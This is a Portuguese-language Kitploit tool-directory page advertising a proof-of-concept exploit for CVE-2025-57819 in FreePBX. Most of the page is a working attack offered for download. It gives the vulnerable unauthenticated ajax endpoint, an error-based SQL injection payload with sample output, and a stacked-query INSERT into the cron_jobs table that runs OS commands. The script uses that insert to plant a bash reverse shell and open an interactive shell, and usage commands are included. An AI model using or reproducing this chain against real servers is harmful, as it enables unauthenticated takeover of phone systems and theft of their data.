Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
Ferramentas/GitHubGitHub/b4sh2/cve-2025-57819-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

Ver Repositório
72há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-57819 — FreePBX SQLi não autenticado → RCE

Exploit de disparo único para a injeção SQL não autenticada do Endpoint Manager do FreePBX (CVE-2025-57819), encadeada em execução remota de código por meio da tabela cron_jobs do FreePBX.

Apenas para testes de segurança autorizados / uso em CTF.


Vulnerabilidade

O manipulador ajax do módulo endpoint concatena o parâmetro brand diretamente em uma consulta SQL, e o caminho do módulo FreePBX\modules\endpoint\ajax ignora a verificação de autenticação/Referrer do ajax. Isso resulta em uma injeção SQL baseada em erro não autenticada (via EXTRACTVALUE), com escritas por consultas empilhadas habilitadas.

Ponto de injeção:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

Prova (leitura baseada em erro):

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}

Afetados: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

Técnica de RCE

A injeção é somente leitura por si só, mas consultas empilhadas permitem escritas. O FreePBX executa jobs da tabela cron_jobs por meio do gerenciador de cron, portanto inserir uma linha resulta em execução arbitrária de comandos (em ~60s, com agendamento * * * * *):

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

O comando injetado é um reverse shell em bash. A linha de cron é removida automaticamente após o primeiro callback para evitar conexões repetidas.

Requisitos

root@kitploit:~
pip install requests urllib3

Python 3. A detecção de IP embutida (-i/--interface) é somente Linux; use --ip em outras plataformas.

Uso

root@kitploit:~
# Padrões: interface tun0, porta 4444 — inicia listener, explora, abre um shell
python3 exploit.py http://{target}

# Escolha uma interface / porta diferente
python3 exploit.py http://{target} -i eth0 -p 9001

# Defina o IP do listener explicitamente
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

O script:

  1. Confirma a SQLi (vaza a versão do banco de dados).
  2. Inicia um listener TCP na porta escolhida.
  3. Injeta o job de cron do reverse shell e verifica se a linha foi criada.
  4. Aguarda ~70s pelo callback e então abre um shell interativo (com tentativa automática de upgrade para PTY).
  5. Remove a linha de cron injetada.

Referências

  • Horizon3.ai — CVEs atualizados do FreePBX: Auth Bypass & RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • Aviso do FreePBX GHSA-m42g-xg4c-5f3h
Baixar ferramenta